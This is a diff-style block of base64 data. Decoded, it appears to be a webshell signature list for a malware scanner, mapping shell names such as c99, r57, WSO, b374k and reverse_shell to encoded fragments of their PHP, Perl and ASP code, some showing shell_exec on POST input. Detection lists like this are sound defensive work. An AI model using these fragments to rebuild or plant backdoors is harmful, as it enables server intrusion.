+SmFVSXlXVmQ0TVZwVU1HbEtlbk5uV2xkT2IySjVRV3RpTTFZd1kwaFdNRTk1UW14Wk1tIjtzOjE1 +OiJjbWRbMzNdWzBdW3BocF0iO3M6NjQ6ImdQRDl3YUhBTkNpOHFJRTV2ZHlCM1pTQnRZV3RsSUdF +Z2JHbHpkQ0J2WmlCMGFHVWdaR2x5WldOMGIzSnBaWE0iO3M6MjM6ImF5eWlsZGl6X3RpbVsxXVsw +XVtwaHBdIjtzOjY0OiIwTjNaVzA0TDFRdlkzWm9ZMkV5WkVzelZrdEtMMlUzSzNrNFdHUjVPRWhs +YVRVM1RVMDVXWEJWZHk5SWJ5OHphIjtzOjE1OiJjOTlbMThdWzBdW3BocF0iO3M6NjQ6IkdaMWJt +TjBhVzl1WDJWNGFYTjBjeWduYjJOcFgyTnZibTVsWTNRbktTa2dEUW9nSUNBZ0lDQWdJQ1IwWlcx +d1ciO3M6MjA6ImZpbGVzbWFuWzEzXVswXVtwaHBdIjtzOjY0OiJYM0psYzNSdmNtVW9JbTl3Wlc1 +ZlltRnpaV1JwY2lJcE93b2tiR2w2TUQxemFHVnNiRjlsZUdWaktDUmZVRTlUIjtzOjE4OiJsaXpv +emltWzBdWzBdW3BocF0iO3M6NjQ6ImdiblZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tU +c0tQejRLUEdoMGJXdytQR2hsWVdRK1BHMWxkR0UiO3M6MTQ6ImM5OVs2XVswXVtwaHBdIjtzOjY0 +OiJHVmphRzhnSWlSZlUwVlNWa1ZTVzFCSVVGOVRSVXhHWFNJZ095QS9QaUlnYldWMGFHOWtJRDBn +SW5CdmMzUWlQIjtzOjIyOiJyZW1vdGVzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJWY01UWXlYSGcz +TUZ4NE4yTmNNVFUxYzI1Y01UUXlYSGcyWmx4NE56UjhZMXg0TnpKY01UUXhYREUyTjJ4bGNuIjtz +OjI2OiJzaGVsbF91cGxvYWRlclsxNl1bMF1bcGhwXSI7czo2NDoid00zcFhTMjVTWmtsaVJtaDBV +RFZ4UlcxSE4xVnhXVXhRVkV4b1ZIUlVkMDl2YkhKTVUwSkRkM1F4ZGtOaFJrRiI7czoyMToibm9n +cm9kcEJvdFsxXVsxXVtwaHBdIjtzOjY0OiJCcGMyRm9hMkZ1SUdSbGJtZGhiaUJ6Y0dGemFRMEtE +UW92S2lvcUlFRmtiV2x1SUNvcUtpOE5DaVJoWkcxcGJpIjtzOjIxOiJnYXVsaXJjYm90WzBdWzJd +W3BocF0iO3M6NjQ6IjJodklDSWdJRHgwWkNCdWIzZHlZWEFnWTI5c2MzQmhiajFjSWpaY0lpQnpk +SGxzWlQxY0luQmhaR1JwYm1jdGIiO3M6MTU6ImVybmVbMF1bMF1bcGhwXSI7czo2NDoiTnBlbVU5 +TVRFd1Bqd3ZabTl5YlQ0OEwyTmxiblJsY2o0OFluSStDaUk3Q21sbUtFQWtYMUJQVTFSYkozTm9K +MSI7czoxNDoiaW1nWzBdWzBdW3BocF0iO3M6NjQ6IngxYzJnb0tUc0tJQ0FnSUNBZ0lDQWdJQ0Fn +SUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1SUhKbGNHeGhZMlZPWlgiO3M6MTk6InB3bnNoZWxsWzBd +WzBdW2pzcF0iO3M6NjQ6IlZ5ZG1WeVd6RmRMQ0FrYkdsdVpWc3dYU3dnSkhSdGNDa2dLU0I3RFEw +S0NRa0pDUWtKQ1NSemRXTmpaWE56S3kiO3M6MTk6ImZpbGVzbWFuWzhdWzBdW3BocF0iO3M6NjQ6 +Im9KZlEwS2ZRMEtEUXAzYUdsc1pTZ2tiR1YyWld3dExTa2dZMmhrYVhJb0lpNHVJaWs3RFFvTkNp +UmphQ0E5SUciO3M6MjY6Iml0c2VjdGVhbV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJJNU1EUmlP +R05tWXpRNE5EZGpOVFZpTmlJN0lHbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25jSFZtWkcxeUox +IjtzOjE1OiJjbWRbMjldWzBdW3BocF0iO3M6NjQ6IlZGVTFSYkoyTnRaQ2RkS1NsN0RRb2dJQ0Fn +SUNBZ0lHVmphRzhnSWp4d2NtVStJanNOQ2lBZ0lDQWdJQ0FnSkciO3M6MTU6ImNtZFsyMF1bMF1b +cGhwXSI7czo2NDoiVlFzSUNkVlZFWXRPQ2NwT3dvZ0lDQWdJQ0I5Q2dvZ0lDQWdJQ0IzYUdsc1pT +QW9JV1psYjJZb0pHbHZXekpkSyI7czoyMDoiZGl2ZXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik1U +QXdJaUIyWVd4MVpUMGlQRDhnWldOb2J5QWtZM1Z5WkdseU95QS9QaUkrUEM5MFpENEtJQ0FnSUNB +Z1BIUmsiO3M6MjA6ImxhbWFzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJsSUcxbGRHaHZaRDF3YjNO +MElHVnVZM1I1Y0dVOWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlUNGdKRzV2ZDJGIjtzOjIwOiJw +aHBzaGVsbFsyM11bMF1bcGhwXSI7czo2NDoiZ2RHVnliWE1nWVhKbElHNXZkQ0JoWTJObGNIUmhZ +bXhsSUhSdklIbHZkU3dnZEdobGJnMEtMeThnWkc4Z2JtOSI7czoyNDoicmV2ZXJzZV9zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJpQmxibU52ZFc1MFpYSmxaQ0JoYmlCcGJuUmxjbTVoYkNCbGNuSnZj +aUJ2Y2dwdGFYTmpiMjVtYVdkMWNtRjBhIjtzOjE5OiJtb2hhamVyMjJbMF1bMF1bcGxdIjtzOjY0 +OiJvU1dsR01VbElSV2xqVTBGcFNYbFphRWxwUVhOSmVWRm5aSGxGYUVwNVkybGthV05vU1ZORmFF +bFRRWFJKZVRCIjtzOjIwOiJmaWxlc21hblsxOV1bMF1bcGhwXSI7czo2NDoibFJ6TllValJrYjNo +bmVsSkpWMk5XVFc1amNVVjNURmMxZW5Wd09WZGpXV050ZW1WcVVEZFdObmRNYWxkM09XOCI7czox +ODoid2Vicm9vdFswXVswXVtwaHBdIjtzOjY0OiJodklDUjBZV0pzWlY5MWNESTdDbVZqYUc4Z0pH +WnZiblE3Q21WamFHOGdJanhpUGlJdWQzTW9NamNwTGlSc1lXIjtzOjE0OiJyNTdbMF1bMF1bcGhw +XSI7czo2NDoiMHRMUzB0TFMwdExTMHRDZ29nSUVScGJTQnZVMk55YVhCMENpQWdSR2x0SUc5VFkz +SnBjSFJPWlhRS0lDQkVhVyI7czoxNDoiY21kWzBdWzBdW2FzcF0iO3M6NjQ6ImxZVDRpT3cwS0pI +Tm1iblE5SWp4bWIyNTBJR1poWTJVOWRHRm9iMjFoSUhOcGVtVTlNaUJqYjJ4dmNqMGpNREEiO3M6 +MTM6Im1tWzBdWzBdW3BocF0iO3M6NjQ6Ik5EVWs5TVRFSkJVaTFCVWxKUFZ5MURUMHhQVWpvZ0l6 +TTJNMlEwWlRzS1UwTlNUMHhNUWtGU0xWUlNRVU5MTFUiO3M6MTg6Im5zdHZpZXdbMl1bMF1bcGhw +XSI7czo2NDoiVEl1Tmk0MExYQnNNaThuTEFvbkwzQm9jRTE1UVdSdGFXNHRNaTQyTGpRdGNHd3pM +eWNzQ2ljdmNHaHdUWGxCWiI7czoyOToicGhwbXlhZG1pbl9leHBsb2l0WzBdWzBdW3BocF0iO3M6 +NjQ6Ik1sRm1ZbnBLVFhwM2FDdENTVXNLWWtGUFNUUmpTRzgyVjJNMFp5dFlUR2hGVDI5cGVHVjBl +RGxFYmpOT2FtZFAiO3M6MTY6ImIzNzRrWzJdWzBdW3BocF0iO3M6NjQ6InBPT1ZKYU1FWTJiMjFW +TkRZMFkwbFBNRUZqTVVkeVdVeGtlV2hNUkRkVVVITkVMM0IwVFN0NVlXMXNSRGw2ZEQiO3M6MjY6 +InNoZWxsX3VwbG9hZGVyWzEzXVswXVtwaHBdIjtzOjY0OiJlR3R5YjNKcElEMGdJbUU0WVRRM1l6 +QmhNVFkzTjJZd04yTmhaV1V3T0dGa1ptVmlOVGt6WldRd0lqc2dhV1lvIjtzOjE1OiJjbWRbMzVd +WzBdW3BocF0iO3M6NjQ6InZZMnRsZENrN0RRcDlEUXB6Wlc1a2NtRjNLQ1JKVWtOZlkzVnlYM052 +WTJ0bGRDd2dJbEJTU1ZaTlUwY2dKSEIiO3M6MTk6ImVtcGl4Y3Jld1swXVswXVtwbF0iO3M6NjQ6 +Ind2ZEhJK0lqc05DZzBLY0hKcGJuUWdJangwY2o0OGRHUStQR0krUTJoaGJtZGxJR1JwY21WamRH +OXllVG84TDIiO3M6MTY6IndvcnNlWzFdWzBdW3BocF0iO3M6NjQ6IlZWSkZKMTB1SWp3dlptOXVk +RDQ4TDNSa1BpSTdDbkJ5YVc1MElDQWdJQ0k4TDNSeVBpSTdDbkJ5YVc1MElDQWciO3M6MTU6Indp +bnhbMF1bMF1bcGhwXSI7czo2NDoiWlROWll6SmFXRGRzZFdOMk5sbEdlalpCWjBSbE5YRmFTR1V4 +TlN0bmRreHZVMDFtTkhsSFFteDJOSFpwTUhoViI7czoxNToid3NvWzExXVswXVtwaHBdIjtzOjY0 +OiJQWHQ5S1R0MllYSWdaejFqTG1JdVkyeHBZMnM3WjN4OEtHYzlZeTVpTG1Oc2FXTnJQWHQ5TEdN +dWIyNWpiR2xqIjtzOjE3OiJiMzc0a1sxNF1bMF1bcGhwXSI7czo2NDoibHg0WmpWY2VHUTJYSGhq +WTF4NE5tVmNlR0poWEhnd1pseDRNalJjZUdNMlhIZzVZMXg0TkdWY2VHTTBYSGhsTiI7czoxNToi +Yzk5WzE1XVswXVtwaHBdIjtzOjY0OiJ5OHZPVlJaTkRBMVYyWnhUMjEyYWtrcllraHZZVzlSYzAx +UmVGSXJkWFZpYmpkaWRTc3daaTh2TDNsSU5VSkJSIjtzOjE3OiJjb2RlcnpbMV1bMF1bcGhwXSI7 +czo2NDoiUmxJRDBnUUdsdWFWOW5aWFFvSjNOaFptVmZiVzlrWlNjcE93MEthV1lvSVNSellXWmxY +MjF2WkdVcERRb2dJQyI7czoxNDoid3NvWzldWzBdW3BocF0iO3M6NjQ6IlBqeGhJR2h5WldZOUp5 +UlFTRkJmVTBWTVJqOWhZM1JwYjI0OWRYUnBiSE1tWTI5dGJXRnVaRDF6YUc5M1gzQnkiO3M6MTY6 +Im15c3FsWzNdWzBdW3BocF0iO3M6NjQ6IlNkdUp6NDhabTl1ZENCbVlXTmxQWFJoYUc5dFlTQnph +WHBsUFMweVBqeGlQbTh0TFMxYklGTnVTWEJGY2w5VFEiO3M6MjI6InNuaXBlcnNoZWxsWzFdWzBd +W3BocF0iO3M6NjQ6IkZsYlhFM1RuRjNPSE5ZUWxrd01sWTBkM1F3UnpscWRIZFhUSEpIZUVoaGJW +Rm1URzA0UVhKU1pETm1MM3BtUXoiO3M6MjA6ImZpbGVzbWFuWzIyXVswXVtwaHBdIjtzOjY0OiJo +Y25KaGVTazdDaUFnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ1JmVUU5VFZDQTlJSE4wY21sd2MyeGhj +MmhsYzE5IjtzOjE0OiJ3c29bM11bMF1bcGhwXSI7czo2NDoidG1abWhWV21velNIaE1SVVJ0Y2pG +SlowbG5jVlY1WTJoTFMzVTRjamsyYlVKRVNHdFFTRWcwYW5ZNGJTOUtVMCI7czoxNToid3NvWzEw +XVswXVtwaHBdIjtzOjY0OiJmWW5WbVpsOXdjbVZ3WVhKbEtDazdJQTBLYVdZZ0tDRm1kVzVqZEds +dmJsOWxlR2x6ZEhNb0ltTTVPVjl6WlhOIjtzOjE5OiJwaHBzaGVsbFs1XVswXVtwaHBdIjtzOjY0 +OiJZakkxTUVsSFRuWmlSemw1VUZOSmFrMUVRa2RTYWtGM1NXbzFNMlF6WTNWUldFcG9XV2t4UTJK +SFJtcGhNbWhvIjtzOjI0OiJhcmFiX2JsYWNrX2hhdFsxXVswXVtwbF0iO3M6NjQ6ImdKR2x6YkdG +emRDQTlJR0Z5Y21GNUtEQWdQVDRnVkZKVlJTazdDZ2xsWTJodktDSUpQSFJ5UGx4dUlpazdDZ2wi +O3M6MTk6IndlYmFkbWluWzBdWzJdW3BocF0iO3M6NjQ6IjJGaWMyOXNkWFJsSnpzS1gzRXVjM1I1 +YkdVdWQybGtkR2dnUFNBbk1UWndlQ2M3Q2w5eFcxOXVYU2duWm5KaGIiO3M6MTY6InB6YWR2WzFd +WzFdW3BocF0iO3M6NjQ6IlBEOXdhSEFLSkdWdWRISjVYMnhwYm1VOUlraEJRMHRsWkNCaWVTQkZi +blJ5YVV0aElqc0tKR1p3SUQwZ1ptOXciO3M6MTg6ImVudHJpa2FbMF1bMF1bcGhwXSI7czo2NDoi +bGVIUTFOQ2M5UGlmRGo4T3V3NmpEc2NPcUlNT3l3NlhEcXNPeHc3TERvQ0REb2lERHRNT2d3Nm5E +cThPZ3c3VSI7czoxNDoicjU3WzNdWzBdW3BocF0iO3M6NjQ6Im5XVEpHZWxwVFFXbGpSMUp0U1dw +dlowcEhUakJsV0VKc1VGTkthR05JUW5OaFYwNW9aRWRzZG1KcE9YZGFSMWwiO3M6MTk6ImI2NHNo +ZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik9TVXc0VVUxeVdGVmpZMHBHWWt4NmJrSjBNME54WVdJNWRs +RjRWMmhMVUdGMksyOWhNa0Z5VVdaM1NqWTRMMEoiO3M6MjA6InN0dW5zaGVsbFszXVswXVtwaHBd +IjtzOjY0OiJtNWxZM1JDWVdOcklFSmhZMnRrYjI5eUlIWnpJREV1TUNCaWVTQk1iM0pFSUc5bUlF +bFNRVTRnU0VGRFMwVlNVIjtzOjI1OiJiYWNrZG9vcmNvbm5lY3RbMF1bMF1bcGxdIjtzOjY0OiJp +Ym05b2RYQWdMM1J0Y0M5dWMzUmZZbVFnSmlJcE93cDFibXhwYm1zb0lpOTBiWEF2Ym5OMFgyTmZZ +bVF1WXlJIjtzOjE4OiJuc3R2aWV3WzFdWzBdW3BocF0iO3M6NjQ6ImxPdzBLRFFvZ0lDQjlEUW9O +Q2cwS0RRcG1kVzVqZEdsdmJpQm5aWFJmY0dWeWJYTW9KR1p1S1EwS0RRcDdEUW8iO3M6MjA6Im4z +ZmE1dDFjYVswXVswXVtwaHBdIjtzOjY0OiJXQ2N1SnpKT2RtSnVKeTRuVW14bFNGSW5MaWRtV1RO +S2JGbFlVaWN1SjJ3bktTeGlZWE5sTmpSZlpHVmpiMlJsIjtzOjE3OiJpZnJhbWVbMF1bMF1bcGhw +XSI7czo2NDoiTVR3bFFDQlFZV2RsSUV4aGJtZDFZV2RsUFNKS2MyTnlhWEIwSWlVK1BDVmxkbUZz +S0ZKbGNYVmxjM1F1U1hSbCI7czoxNToiY21kWzM2XVswXVtwaHBdIjtzOjEzNToiYmI6SkY5YlhU +MHJLeVJmWHpzZ0pGOWJYVDBrWDFzdExTUmZYMTFiSkY5ZlBqNGtYMTlkT3lSZld5UmZYMTB1UFNn +b0pGOWZLeVJmWHlrcklDUmZXeVJmWHkwa1gxOWRLUzRvSkY5Zkt5UmZYeXNrWDE4cEt5UmZXeVJm +WHkwa1gxOWRPdz09IjtzOjE1OiJjbWRbMjddWzBdW3BocF0iO3M6NjQ6ImRHWnZjbTBuWFNrcERR +b2dJQ0FnZXcwS0lDQWdJQ0FrWmlBOUlDUmZSMFZVV3lkbWFXeGxKMTA3RFFvZ0lDQWciO3M6MTk6 +IjEyMDY2N2trWzBdWzBdW3BocF0iO3M6NjQ6Ik5MM2RCZFRKMWJsSmhlbEpxVlVseVlYTlFjMnBY +VVdWNEswOUZjRXBEV25wVFJ6UmtRekZZU2paelMwTlVXa04iO3M6MjA6InN0dW5zaGVsbFs0XVsw +XVtwaHBdIjtzOjY0OiJqNDhhVzV3ZFhRZ2JtRnRaVDBpWTIxa0lpQjBlWEJsUFNKMFpYaDBJaUJ6 +YVhwbFBTSXhNemdpSUhaaGJIVmxQIjtzOjE1OiJjbWRbMjhdWzBdW3BocF0iO3M6NjQ6IjhMM1Jo +WW14bFBpSTdDZ29nSkhCbGNtUnBjaUE5SUVCd1pYSnRhWE56YVc5dWN5aG1hV3hsY0dWeWJYTW9K +SFIiO3M6MTY6InhpbmZvWzBdWzBdW3BocF0iO3M6NjQ6Ik5mWVhKeUlEMGdKRzV2ZEd4eklEMGdi +blZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tUc0tQejQ4YUgiO3M6MTU6ImM5OVsxMV1b +MF1bcGhwXSI7czo2NDoiclFtcEhUVmsyTjFCQ1RYSjFkemhqTlhSbFRqSTFka1JGVjI0NWJrbGph +amx6UW05cGJXTjJaVVZ1U0dFNFFXVSI7czoyMDoicGhwc2hlbGxbMjFdWzBdW3BocF0iO3M6NjQ6 +ImlBZ0lDQWdJR0p5WldGck93MEtJQ0FnZlEwS0RRb2dJQ0F2THlCWFlXbDBJSFZ1ZEdsc0lHRWdZ +Mjl0YldGdVoiO3M6MjI6InNoZWxsYXRpbGRpWzBdWzBdW3BocF0iO3M6NjQ6IlIwYVVvMk1Ia3pN +WEJCVDNCRVJubEtaVWRvYjA1VWJYQk9jVGhDVjNNd2VXRjZPRWx6VEd4Q2JVMW1RazlsZDIiO3M6 +MTk6ImZpbGVzbWFuWzRdWzBdW3BocF0iO3M6NjI6IklDaHVjM1FwSUhkb2FXTm9JR3g1Ym5nTkNr +bHpJR3hwYm10eklHbHVjM1JoYkd4bFpEOGdLRzV6ZENrZ2QyIjtzOjE4OiJuc3R2aWV3WzNdWzBd +W3BocF0iO3M6NjQ6ImJXRnBiQ2h6S1NFaUtUc05DZzBLZlEwS1pXTm9ieUFpVTNWalkyVnpjMlox +Ykd4NUlITmxiblFnYldGcGJDaHoiO3M6MjM6ImJsb29kM3Jwcml2OFswXVswXVtwaHBdIjtzOjY0 +OiJaVDBpZEdWNGRDSWdibUZ0WlQwaWJuSmxibUZ0WlNJK0RRbzhhVzV3ZFhRZ2RIbHdaVDBpYzNW +aWJXbDBJaUIyIjtzOjIyOiJzdGFrZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJnUFNBaVpuVnVZ +M1JwYjI1eklpa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9KSE4wWVhSbFBUMHhLU0I3Q2lBIjtz +OjE2OiJteXNxbFs1XVswXVtwaHBdIjtzOjY0OiJBOUlDSmtaWFpwYkhwVGFHVnNiQ0k3RFFva2My +aGxiR3hmWm1GclpWOXVZVzFsSUQwZ0lsTmxjblpsY2lCTWIyIjtzOjIyOiJkZXZpbHpzaGVsbFsx +XVswXVtwaHBdIjtzOjY0OiJ5WWpNVFl3TlRzbUl6RTJNRGc3SmlNeE5qQXlPeVlqTVRVNU16czhM +Mlp2Ym5RK1BDOXpjR0Z1UGp4bWIyNTBJIjtzOjE0OiJjOTlbN11bMF1bcGhwXSI7czo2NDoiaGJX +VXBPdzBLZlEwS1pXeHpaV2xtS0NSZlVFOVRWRnNuZEhsd1pTZGRQVDAzS1EwS2V3MEtaV05vYnlC +aGJHbCI7czoyMDoicm9vdHNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IlJ6aE9lR3N3YjFCa1IxbEdZ +Mk5CV0VWVFRUUnRhMWRLVERNMUwyWnFVVFEwVERoelZUUkZNMm94VDFacGJGQm4iO3M6MTQ6ImM5 +OVszXVswXVtwaHBdIjtzOjY0OiJITW9KSFkyTm1JeE9EZzJOaXdnTkRBNU5pa3BJSHNnSkhZNFpE +YzNOMll6T0NBdVBTQWtkak0wTVdKbE9UZGtPIjtzOjE1OiJzcGFtWzFdWzBdW3BocF0iO3M6NjQ6 +IklHUmxiR1YwWlNCMGFHVWdaM3BwY0NCbWFXeGxJR0ZzYzI4dUlFa2djbVZqYjIxdFpXNWtJR3hs +WVhacGJtY2ciO3M6MTc6ImJhY2t1cFsxXVsyXVtwaHBdIjtzOjY0OiJwWmlocGMzTmxkQ2drWTIx +a1d6RmRLU0FtSmlBa1kyMWtXekZkSUQwOUlqQXdNU0lwRFFvZ0lDQWdJQ0FnZXcwIjtzOjE1OiJw +Ym90WzBdWzBdW3BocF0iO3M6NjQ6ImJreHVNMUZpVkZKamIwaFVhR3REUWxKVVNYcG5VazFaUVVa +U2JWbHZOWEJJY1VGSGFucFdjV2hEWTNGblIzQmoiO3M6MTk6IndlYnNoZWxsWzBdWzBdW3BocF0i +O3M6NjQ6ImlJaTRrY0hka0xpSmNJaUF2UGdvSkNUd3ZabTl5YlQ0S0NRazhMMlJwZGo0aU93b0pD +U1J6WDNKbGMzVnNkQ0EiO3M6MTY6ImIzNzRrWzhdWzBdW3BocF0iO3M6NjQ6IjFaMlVETTNURVZC +VkdGdlVYQkVVRzAwVDFOellucFRlVTEwWWk5MmVqQkpOVzltUkdwMU56WTBiMG95TlZSaVciO3M6 +MTQ6ImM5OVswXVswXVtwaHBdIjtzOjY0OiJJQ0FnSkhCeVkzTWdQU0JoY25KaGVTZ3BPdzBLSUNB +Z0lDQWdkVzV6WlhRb0pITjBZV05yV3pCZEtUc05DaUFnIjtzOjIyOiJGYVRhTGlzVGlDelsxXVsw +XVtwaHBdIjtzOjY0OiJ4dmNqMGlVbVZrSWo0Z0NpQWdJQ0FnSUNBZ0lDQThkR1Y0ZEdGeVpXRWdi +bUZ0WlQwaVpIVjZaVzU0SWlBS0lDIjtzOjE5OiJrbGFzdmF5dlswXVswXVthc3BdIjtzOjY0OiJT +V1ZIWkVSRFpXUkxWa3BmVGtGUE5ua3FkSGxuY2tocWNDcE1ORXBhT1hwQmVrNXpaa2xYVEUxQ05G +cEhNblJ5IjtzOjE1OiJ3c29bMTRdWzBdW3BocF0iO3M6NjQ6ImlBa2NHOXlkR0VzSUZCeWIzUnZJ +RDArSUNkMFkzQW5MQ0JVYVcxbGIzVjBJRDArSURRcE93b2dJQ0FnSUNBZ0kiO3M6MTg6InNoZWxs +Ym90WzFdWzBdW3BsXSI7czo2NDoiVEF3SlNJZ2FXUTlJa0YxZEc5T2RXMWlaWEkwSWlCb1pXbG5h +SFE5SWpFNUlqNEtJQ0FnSUNBZ0lDQWdJRHgwYyI7czoxNzoicGh2YXl2WzBdWzBdW3BocF0iO3M6 +NjQ6ImxsYm5SbExUNXlaVzF2ZG1Vb0pHWm9LVHNLSUNBZ0lDQWdKR1pvTFQ1amJHOXpaVHNLSUNB +Z0lDQWdaR1ZzWlgiO3M6MTU6InpvcnJvWzFdWzBdW3BsXSI7czo2NDoic2JtdGhTSE41VlRZNFNI +cHhTa3R5Tmk5bU4zbFpUVmh5WVdOV1luZG1UMVpxVEhobVRtTTNkVmgwSzNaMGNEbCI7czoxNDoi +aTQ3WzBdWzBdW3BocF0iO3M6NjQ6Ino1Y2JpSTdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0Fn +Y0hKcGJuUWdJbE5qY21sd2REb2dQR0p5SUM4K1AiO3M6MTc6Imxvc3RkY1swXVswXVtwaHBdIjtz +OjY0OiJDOHZaUzVuSUNKak9pSXNJQ0l2SWl3aUwyaHZiV1VpQ2lSMGFXMWxiR2x0YVhRZ1BTQTJN +RHNnTHk5c2FXMXBkIjtzOjE1OiJjOTlbMTJdWzBdW3BocF0iO3M6NjQ6IjNWc2RBb2diSFpCZEhS +eWFXSjFkR1Z6SUQwZ1UzQnNhWFFvUTI5dWRtVnlkRUpwYm1GeWVTaEJkSFJ5YVdKMWQiO3M6MjM6 +InJlbW92ZXhwbG9yZXJbMF1bMF1bdmJdIjtzOjY0OiJvSVdaMWJtTjBhVzl1WDJWNGFYTjBjeWh6 +YUdWc2JGOWxlR1ZqS1NsN0pHOXdiM0E5Y0c5d1pXNG9KRzlqYldRIjtzOjE3OiJla2luMHhbMF1b +MF1bcGhwXSI7czo2NDoiQ0FnSUNBZ2NISnBiblJNYjJkcGJpZ3BPdzBLQ1VCcGJtbGZjMlYwS0Nk +dmRYUndkWFJmWW5WbVptVnlhVzVuSiI7czoyMDoiMW43M2N0aW9uWzFdWzBdW3BocF0iO3M6NjQ6 +IklEd3ZkR1ErUEhSa1BqeG1iMjUwSUdOdmJHOXlQWGxsYkd4dmR6NTVZWHB0WVNCNVpYUnJhWE5w +SUhaaGNpRTgiO3M6MTc6InplaGlyNFswXVswXVthc3BdIjtzOjY0OiIyWVhJZ2N5eGhMR2tzYWl4 +eUxHTXNiQ3hpUFdSdlkzVnRaVzUwTG1kbGRFVnNaVzFsYm5SelFubFVZV2RPWVcxIjtzOjE1OiJ3 +c29bMjBdWzBdW3BocF0iO3M6NjQ6Ims3RFFvZ0lDQjlEUW9nSUNCcFppQW9YQ1JqWVhObElEMStJ +QzllYlhOblhITXJLRnhUS3lrZ0tDNHFLUzhwSUgiO3M6MjA6ImVneXNwaWRlclsxXVswXVtwaHBd +IjtzOjY0OiJUZHlJN0RRb2tjRzl5ZEZzeU1UQTJYU0E5SUNKTldrRlFJanNOQ2lSd2IzSjBXekl4 +TkRCZElEMGdJa1JsWlhCIjtzOjE0OiJnZnNbMl1bMF1bcGhwXSI7czo2NDoiMldsVXphMmhFVEV0 +RGJHeHliMnMwUjA1WFNGZG5jMU5VZVZocE0xZHZkVmxMV0RWbVUweHlXR3h5U0ZsV1NrZCI7czoy +NToic2hlbGxfdXBsb2FkZXJbOV1bMF1bcGhwXSI7czo2NDoiRGV5UmtZMk56YjJOcmZYdGpkWEpp +ZVhSbGZTQTlJREE3RFFvZ0lDUkVRME43SkdSalkzTnZZMnQ5ZTJGeWNYViI7czoxODoic2hlbGxi +b3RbMF1bMF1bcGxdIjtzOjY0OiIzZ3NKR1YwTENSbWIyOTBaWElzSkdoamQyUTdEUXBsWTJodklD +YzhhVzFuSUhOeVl6MGlhSFIwY0RvdkwzY3diIjtzOjE1OiJvYmV0WzBdWzBdW3BocF0iO3M6NjQ6 +IjI5eVlYUnBiMjQ2Ym05dVpRcDlDaTh2TFMwK0Nqd3ZjM1I1YkdVK0Nqd3ZhR1ZoWkQ0S1BHSnZa +SGsrQ2p3L0MiO3M6MTY6Im15c3FsWzFdWzBdW3BocF0iO3M6NjQ6ImtwS1NsN0RRcGxZMmh2S0NK +VFlXWmxJRTF2WkdVZ2IyWWdkR2hwY3lCVFpYSjJaWElnYVhNZ09pQWlLVHNOQ20iO3M6MTU6ImNt +ZFsyMl1bMF1bcGhwXSI7czo2NDoiRkkrQ2p3L2NHaHdDaUFnZlFvL1Bnb2dJRHhVVWo0S0NpQWdQ +RlJFUGp4RVNWWWdVMVJaVEVVOUltWnZiblF0WiI7czoxNjoiaDRudHVbMF1bMF1bcGhwXSI7czo2 +NDoiZGZZbXhoYm1zbklHaHlaV1k5SnlSamIyNW1hV2NuUG1OdmJtWnBaend2WVQ0OEwzUmtQangw +WkQ0aUxpUnlMaSI7czoxODoic3ltbGlua1sxXVswXVtwaHBdIjtzOjY0OiJOUU0yTnBORTFUY21s +WGRrVlROVEZWYjJORlRFVXZVSGxaYUdOWmFrZHJialpSYldJelIwdzBPRkF3V0Zwa2JrIjtzOjE0 +OiJyNTdbNF1bMF1bcGhwXSI7czo2NDoiWW1zd2RrNVhOSFpSVlhCMVREQXdNV0pwT1dGalJ6UjJZ +bFp3ZFV3emNFdGlhVGgyVDBoa1FsRlZNVE5SVTBsMSI7czoyMToibG9jdXNzaGVsbFswXVswXVtw +aHBdIjtzOjY0OiJNeldqWmtiMEZhZVdkc2JXRkZaRmxtZGk5SmJtMXVhVlZJZEdWbVJFRkphWE5z +UW1kQ1QyRTJha0phS3pCYWVVIjtzOjE5OiJmaWxlc21hblszXVswXVtwaHBdIjtzOjY0OiIwUWxS +bWVVUm1abmRCUkRRMmNVRkJRVUZwTXpNNGFUQXdUWGRtT0VWVU5ERk5UV1o1UkM5Nk9USkJNbTh2 +V0RSIjtzOjE4OiJ3YWNraW5nWzBdWzBdW3BocF0iO3M6NjQ6IlJjZURZNWIyNWhiR3g1TENCY2VE +WXhJRng0TXpRd05DQk9YSGcyWm5SY2VESXdYSGcwTmx4NE5tWmNlRGMxYm0iO3M6MTU6Indzb1sx +N11bMF1bcGhwXSI7czo2NDoiazF2UVUwd04waExWVTkzUzJKMVJIZDZjM2R5ZFdKT2FuSmxWVVJH +VjJkRVFrRjNZV3BDTTBGcFlVaEhkbVoxZSI7czoyMDoic3R1bnNoZWxsWzFdWzBdW3BocF0iO3M6 +NjQ6IkNSMk0yUXlObUl3WWpFcElIc2daMnh2WW1Gc0lDUjJOakU1WkRjMVpqZzdJR2xtSUNnaGFX +NWZZWEp5WVhrb0oiO3M6MTU6InNwYW1bMF1bMF1bcGhwXSI7czo2NDoiRm9NR1E1VTBSU1Z6SnRU +MkpZVWpsNGRGcDVjVVZhVm5wdWVuWjJRVWhhTURkemVtUkZOekJNVG10VVVVNWthMyI7czoyMDoi +MW43M2N0aW9uWzJdWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdMeThOQ2k4dkx5OHZMeTh2THk4dkx5 +OHZMeTh2THk4dkx5OHZMeTh2THk4dkx5OE5DZzBLRFFwcFoiO3M6MTk6InNhZmVtb2RlWzRdWzBd +W3BocF0iO3M6NjQ6ImpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJd29LSTFZZ1kyVnNhbUZvSUc1 +bGMyRnVhMk5wYjI1cGNtOTJZVzUiO3M6MTU6Imx1cm1bMF1bMF1bY2dpXSI7czo2NDoiazdJR1Y0 +YVhRN0lIMGdQejQ4UDNCb2NDQnBaaWhwYzNObGRDZ2tYMGRGVkZzaWREYzJNalJ1SWwwcEtYc2dJ 